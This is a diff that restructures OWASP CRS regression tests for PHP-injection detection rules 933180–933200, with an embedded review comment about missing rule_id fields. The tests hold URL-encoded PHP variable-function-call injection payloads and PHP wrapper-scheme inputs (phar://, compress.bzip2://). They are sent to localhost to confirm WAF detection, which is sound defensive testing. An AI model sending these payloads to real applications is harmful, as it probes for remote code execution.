stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%40%24__%5Bo%5D%284%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'foo=%40%24__%5Bo%5D%284%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 6 desc: $__['o'](5) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 
'foo=%24__%5B%27o%27%5D%285%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'foo=%24__%5B%27o%27%5D%285%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 7 desc: $__[@o](6) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24__%5B%40o%5D%286%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'foo=%24__%5B%40o%5D%286%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 8 desc: $__[$_[1]](7) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24__%5B%24_%5B1%5D%5D%287%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'foo=%24__%5B%24_%5B1%5D%5D%287%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 9 desc: $__[@$c](8) stages: - - stage: - input: - dest_addr: 
127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24__%5B%40%24c%5D%288%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'foo=%24__%5B%40%24c%5D%288%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 10 desc: $d['o'](9) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: '%24d%5B%27o%27%5D%289%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: '%24d%5B%27o%27%5D%289%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 11 desc: ${@a}(10) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24%7B%40a%7D%2810%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 
+ port: 80 + uri: / + data: 'foo=%24%7B%40a%7D%2810%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 12 desc: ${'a'}(11) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?foo=%24%7B%27a%27%7D%2811%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?foo=%24%7B%27a%27%7D%2811%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 13 desc: ${@$b}(12) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24%7B%40%24b%7D%2812%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24%7B%40%24b%7D%2812%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 14 desc: ${$s20}['q53b3a6'](13) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: '%24%7B%24s20%7D%5B%27q53b3a6%27%5D%2813%29' - version: "HTTP/1.1" - 
output: - log_contains: id "933180" - - test_title: 933180-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: '%24%7B%24s20%7D%5B%27q53b3a6%27%5D%2813%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 15 desc: $GLOBALS['cf908275'](14) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24GLOBALS%5B%27cf908275%27%5D%2814%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'foo=%24GLOBALS%5B%27cf908275%27%5D%2814%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 16 desc: $OOO000000{0}(15) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'c=%24OOO000000%7B0%7D%2815%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'c=%24OOO000000%7B0%7D%2815%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 17 desc: $OOO0000O0 (16) stages: - - stage: - input: - 
dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24OOO0000O0%20%2816%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24OOO0000O0%20%2816%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 18 desc: $_aB_4c[5]['d'] /*lol*/ (17) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24_aB_4c%5B5%5D%5B%27d%27%5D%20%2F%2Alol%2A%2F%20%2817%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24_aB_4c%5B5%5D%5B%27d%27%5D%20%2F%2Alol%2A%2F%20%2817%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 19 desc: $_aB_4c[@5]/*wat*/[@d] (18) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'x=%24_aB_4c%5B%405%5D%2F%2Awat%2A%2F%5B%40d%5D%20%28%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-20 + - input: + dest_addr: 
127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'x=%24_aB_4c%5B%405%5D%2F%2Awat%2A%2F%5B%40d%5D%20%28%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 20 desc: $_aB_4c/*foo*/[@5]/*bar*/[@d]/*baz*/(19) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'y=%24_aB_4c%2F%2Afoo%2A%2F%5B%405%5D%2F%2Abar%2A%2F%5B%40d%5D%2F%2Abaz%2A%2F%2819%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'y=%24_aB_4c%2F%2Afoo%2A%2F%5B%405%5D%2F%2Abar%2A%2F%5B%40d%5D%2F%2Abaz%2A%2F%2819%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 21 desc: $___[@-_](20) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24___%5B%40-_%5D%2820%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24___%5B%40-_%5D%2820%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 22 desc: 
'@$___[@!+_](21)' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%40%24___%5B%40%21%2B_%5D%2821%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%40%24___%5B%40%21%2B_%5D%2821%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 23 desc: $b374k=@$s_func(22) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24b374k%3D%40%24s_func%2822%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'foo=%24b374k%3D%40%24s_func%2822%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 24 desc: $function\r\n (23) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24function%0D%0A%20%2823%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + 
User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'foo=%24function%0D%0A%20%2823%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 25 desc: $__[_](24) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24__%5B_%5D%2824%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24__%5B_%5D%2824%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 26 desc: $____[_]{_}[@_](25) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24____%5B_%5D%7B_%7D%5B%40_%5D%2825%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24____%5B_%5D%7B_%7D%5B%40_%5D%2825%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 27 desc: multiline with comments stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: x=%24_aB_4c%20%23foo%0D%0A%09%5B5%5D%2F%2Fbar%0D%0A%09%5B%27d%27%5D%20%2F%2Afoo%2A%2F%20%2817%29 - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: x=%24_aB_4c%20%23foo%0D%0A%09%5B5%5D%2F%2Fbar%0D%0A%09%5B%27d%27%5D%20%2F%2Afoo%2A%2F%20%2817%29 + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 28 desc: $$$z(29) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24%24%24z%2829%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24%24%24z%2829%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 29 desc: ${_.__}(30); stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24%7B_.__%7D%2830%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24%7B_.__%7D%2830%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 30 desc: $ {@_.__}(31); stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24%20%7B%40_.__%7D%2831%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24%20%7B%40_.__%7D%2831%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 31 desc: $_[@-_]($_[@!+_] ) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24_%5B%40-_%5D%28%24_%5B%40%21%2B_%5D%20%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24_%5B%40-_%5D%28%24_%5B%40%21%2B_%5D%20%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 32 desc: $f(101).$f(120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24f%28101%29.%24f%28120%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24f%28101%29.%24f%28120%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 33 desc: '@$b374k("foo")' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%40%24b374k%28%22foo%22%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-34 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%40%24b374k%28%22foo%22%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 34 desc: ${$foo->bar}(200) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24%7B%24foo-%3Ebar%7D%28200%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + 
method: "GET" + port: 80 + uri: "/get?x=%24%7B%24foo-%3Ebar%7D%28200%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 35 desc: $foo->$funcname() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: '%24foo-%3E%24funcname%28%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: '%24foo-%3E%24funcname%28%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 36 desc: Foo::$variable() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=Foo%3A%3A%24variable%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=Foo%3A%3A%24variable%28%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml index 32e1408fa..454d8a0d3 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml 
@@ -2,24 +2,21 @@ meta: author: "NiceYouKnow, azurit" description: None - enabled: true - name: 933190.yaml tests: - - test_title: 933190-1 + - test_id: 1 desc: "PHP Injection Attack: PHP Closing Tag Found" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 'file_test=&submit=1' - version: HTTP/1.1 - output: - log_contains: id "933190" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: 'file_test=&submit=1' + version: HTTP/1.1 + output: + log_contains: id "933190" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml index aff09caf0..0b84ff9d4 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml 
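Review bot: The new side of this hunk drops `enabled: true` and `name: 933190.yaml` from `meta:` but does not add the top-level `rule_id` that the 933210.yaml hunk in this same commit introduces (`+rule_id: 933210`), and the 933200.yaml hunk has the same omission. If the runner reads `rule_id` from the file rather than deriving it from the filename, these two files will be parsed without a rule id while 933210.yaml carries one; either way the three files should use the same shape. Adding `rule_id: 933190` after the `meta:` block here (and `rule_id: 933200` in 933200.yaml) would make them consistent with 933210.yaml.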
@@ -2,166 +2,154 @@ meta: author: "NiceYouKnow, azurit" description: None - enabled: true - name: 933200.yaml tests: - - test_title: 933200-1 + - test_id: 1 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (phar://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=phar://phpinfo.zip/phpinfo.txt" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=phar://phpinfo.zip/phpinfo.txt" + version: HTTP/1.1 + output: + log_contains: id "933200" + - test_id: 2 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (compress.bzip2://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=compress.bzip2://file.bz2" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 